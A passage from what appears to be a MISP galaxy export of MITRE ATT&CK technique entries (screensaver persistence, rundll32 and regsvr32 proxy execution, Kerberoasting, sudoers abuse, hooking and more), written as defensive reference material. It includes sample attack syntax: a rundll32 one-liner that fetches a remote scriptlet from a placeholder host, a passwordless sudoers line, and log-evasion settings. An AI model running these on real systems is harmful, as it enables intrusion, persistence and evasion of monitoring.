https://msdn.microsoft.com/library/ms536471.aspx

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/

Screensaver - T1180

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

  • <code>SCRNSAVE.exe</code> - set to malicious PE path

  • <code>ScreenSaveActive</code> - set to '1' to enable the screensaver

  • <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock

  • <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Screensaver - T1180"

Table 6413. Table References

Links

https://attack.mitre.org/techniques/T1180

https://en.wikipedia.org/wiki/Screensaver

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

Rundll32 - T1085

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

The tag is: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085"

Table 6414. Table References

Links

https://attack.mitre.org/techniques/T1085

https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

Hypervisor - T1062

This technique has been deprecated and should no longer be used.

A type-1 hypervisor is a software layer that sits between the guest operating systems and system’s hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.

The tag is: misp-galaxy:mitre-attack-pattern="Hypervisor - T1062"

Table 6415. Table References

Links

http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf

http://en.wikipedia.org/wiki/Xen

http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html

https://attack.mitre.org/techniques/T1062

https://capec.mitre.org/data/definitions/552.html

https://en.wikipedia.org/wiki/Hypervisor

Kerberoasting - T1208

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208"

Table 6416. Table References

Links

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1208

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

https://msdn.microsoft.com/library/ms677949.aspx

https://redsiege.com/kerberoast-slides

https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx

https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

Masquerading - T1036

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.

The tag is: misp-galaxy:mitre-attack-pattern="Masquerading - T1036"

Table 6417. Table References

Links

https://attack.mitre.org/techniques/T1036

https://lolbas-project.github.io/

https://twitter.com/ItsReallyNick/status/1055321652777619457

https://www.elastic.co/blog/how-hunt-masquerade-ball

Scripting - T1064

This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Scripting - T1064"

Table 6418. Table References

Links

http://www.metasploit.com

https://attack.mitre.org/techniques/T1064

https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/

https://github.com/mattifestation/PowerSploit

https://www.uperesia.com/analyzing-malicious-office-documents

https://www.veil-framework.com/framework/

Phishing - T1660

Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as “spearphishing”. Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.

Mobile phishing may take various forms. For example, adversaries may send emails containing malicious attachments or links, typically to deliver and then execute malicious code on victim devices. Phishing may also be conducted via third-party services, like social media platforms.

Mobile devices are a particularly attractive target for adversaries executing phishing campaigns. Due to their smaller form factor than traditional desktop endpoints, users may not be able to notice minor differences between genuine and phishing websites. Further, mobile devices have additional sensors and radios that allow adversaries to execute phishing attempts over several different vectors, such as:

  • SMS messages: Adversaries may send SMS messages (known as “smishing”) from compromised devices to potential targets to convince the target to, for example, install malware, navigate to a specific website, or enable certain insecure configurations on their device.

  • Quick Response (QR) Codes: Adversaries may use QR codes (known as “quishing”) to redirect users to a phishing website. For example, an adversary could replace a legitimate public QR Code with one that leads to a different destination, such as a phishing website. A malicious QR code could also be delivered via other means, such as SMS or email. In the latter case, an adversary could utilize a malicious QR code in an email to pivot from the user’s desktop computer to their mobile device.

  • Phone Calls: Adversaries may call victims (known as “vishing”) to persuade them to perform an action, such as providing login credentials or navigating to a malicious website. This could also be used as a technique to perform the initial access on a mobile device, but then pivot to a computer/other network by having the victim perform an action on a desktop computer.

The tag is: misp-galaxy:mitre-attack-pattern="Phishing - T1660"

Table 6419. Table References

Links

https://attack.mitre.org/techniques/T1660

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html

Bootkit - T1067

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)

Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

Master Boot Record

The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

Volume Boot Record

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:mitre-attack-pattern="Bootkit - T1067"

Table 6420. Table References

Links

http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

https://attack.mitre.org/techniques/T1067

https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf

PowerShell - T1086

PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell’s underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell - T1086"

Table 6421. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

http://www.sixdub.net/?p=367

https://attack.mitre.org/techniques/T1086

https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/

https://github.com/jaredhaight/PSAttack

https://github.com/mattifestation/PowerSploit

https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/

https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Timestomp - T1099

Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Timestomp - T1099"

Table 6422. Table References

Links

http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

https://attack.mitre.org/techniques/T1099

Regsvr32 - T1117

Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)

Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.

Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117"

Table 6423. Table References

Links

https://attack.mitre.org/techniques/T1117

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://support.microsoft.com/en-us/kb/249873

https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/

https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

InstallUtil - T1118

InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft.

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118"

Table 6424. Table References

Links

https://attack.mitre.org/techniques/T1118

https://lolbas-project.github.io/lolbas/Binaries/Installutil/

https://msdn.microsoft.com/en-us/library/50614e95.aspx

CMSTP - T1191

The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: misp-galaxy:mitre-attack-pattern="CMSTP - T1191"

Table 6425. Table References

Links

http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://attack.mitre.org/techniques/T1191

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)

https://github.com/api0cradle/UltimateAppLockerByPassList

https://msitpros.com/?p=3960

https://twitter.com/ItsReallyNick/status/958789644165894146

https://twitter.com/NickTyrer/status/958450014111633408

Keychain - T1142

Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.

To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1142"

Table 6426. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1142

https://en.wikipedia.org/wiki/Keychain_(software)

Launchctl - T1152

Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as <code>launchctl submit -l <labelName> — /Path/to/thing/to/execute "arg" "arg" "arg"</code>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.

Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.

The tag is: misp-galaxy:mitre-attack-pattern="Launchctl - T1152"

Table 6427. Table References

Links

https://attack.mitre.org/techniques/T1152

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Source - T1153

This technique has been deprecated and should no longer be used.

The <code>source</code> command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways <code>source /path/to/filename [arguments]</code> or <code>.This technique has been deprecated and should no longer be used. /path/to/filename [arguments]</code>. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell’s environment.(Citation: Source Manual)

Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.

The tag is: misp-galaxy:mitre-attack-pattern="Source - T1153"

Table 6428. Table References

Links

https://attack.mitre.org/techniques/T1153

https://ss64.com/bash/source.html

Trap - T1154

The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)

The tag is: misp-galaxy:mitre-attack-pattern="Trap - T1154"

Table 6429. Table References

Links

https://attack.mitre.org/techniques/T1154

https://bash.cyberciti.biz/guide/Trap_statement

https://ss64.com/bash/trap.html

HISTCONTROL - T1148

The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.

The tag is: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148"

Table 6430. Table References

Links

https://attack.mitre.org/techniques/T1148

https://capec.mitre.org/data/definitions/13.html

Defacement - T1491

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.

The tag is: misp-galaxy:mitre-attack-pattern="Defacement - T1491"

Table 6431. Table References

Links

https://attack.mitre.org/techniques/T1491

AppleScript - T1155

macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they’re already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.

The tag is: misp-galaxy:mitre-attack-pattern="AppleScript - T1155"

Table 6432. Table References

Links

https://attack.mitre.org/techniques/T1155

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

Geofencing - T1581

Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)

[Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.

One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the user has granted the ACCESS_FINE_LOCATION and ACCESS_BACKGROUND_LOCATION permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include “Allow only while using the app”, which will effectively prohibit background location collection.(Citation: Android Geofencing API)

Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call requestWhenInUseAuthorization() or requestAlwaysAuthorization(), depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.(Citation: Apple Location Services)

[Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411)s and/or advertisements.

The tag is: misp-galaxy:mitre-attack-pattern="Geofencing - T1581"

Table 6433. Table References

Links

https://attack.mitre.org/techniques/T1581

https://blog.lookout.com/esurv-research

https://developer.android.com/training/location/geofencing

https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services

Emond - T1519

Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1160) service.

The tag is: misp-galaxy:mitre-attack-pattern="Emond - T1519"

Table 6434. Table References

Links

http://www.magnusviri.com/Mac/what-is-emond.html

https://attack.mitre.org/techniques/T1519

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

https://www.xorrior.com/emond-persistence/

Hooking - T1617

Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.

The tag is: misp-galaxy:mitre-attack-pattern="Hooking - T1617"

Table 6435. Table References

Links

https://attack.mitre.org/techniques/T1617

Sudo - T1169

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware).

Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo - T1169"

Table 6436. Table References

Links

https://attack.mitre.org/techniques/T1169

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

Hooking - T1179

Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.

Hooking involves redirecting calls to these functions and can be implemented via:

  • Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Elastic Process Injection July 2017)

  • Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Elastic Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)

  • Inline hooking, which overwrites the first bytes in an API function to redirect code flow. (Citation: Elastic Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process’s memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.

Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)

Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)

The tag is: misp-galaxy:mitre-attack-pattern="Hooking - T1179"

Table 6437. Table References

Links

http://www.gmer.net/

https://attack.mitre.org/techniques/T1179

https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/

https://github.com/jay/gethooks

https://github.com/prekageo/winhook

https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx

https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx

https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html

https://www.adlice.com/userland-rootkits-part-1-iat-hooks/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.exploit-db.com/docs/17802.pdf

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918

https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/

https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf

https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/

DNSCalc - T1324

This technique has been deprecated. Please use [DNS Calculation](https://attack.mitre.org/techniques/T1568/003).

DNS Calc is a technique in which the octets of an IP address are used to calculate the port for command and control servers from an initial DNS request. (Citation: CrowdstrikeNumberedPanda) (Citation: FireEyeDarwinsAPTGroup) (Citation: Rapid7G20Espionage)

The tag is: misp-galaxy:mitre-attack-pattern="DNSCalc - T1324"

Table 6438. Table References

Links

https://attack.mitre.org/techniques/T1324

https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

Masquerading - T1655

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name, location, or appearance of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1655)

The tag is: misp-galaxy:mitre-attack-pattern="Masquerading - T1655"

Table 6439. Table References

Links

https://attack.mitre.org/techniques/T1655

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

Impersonation - T1656

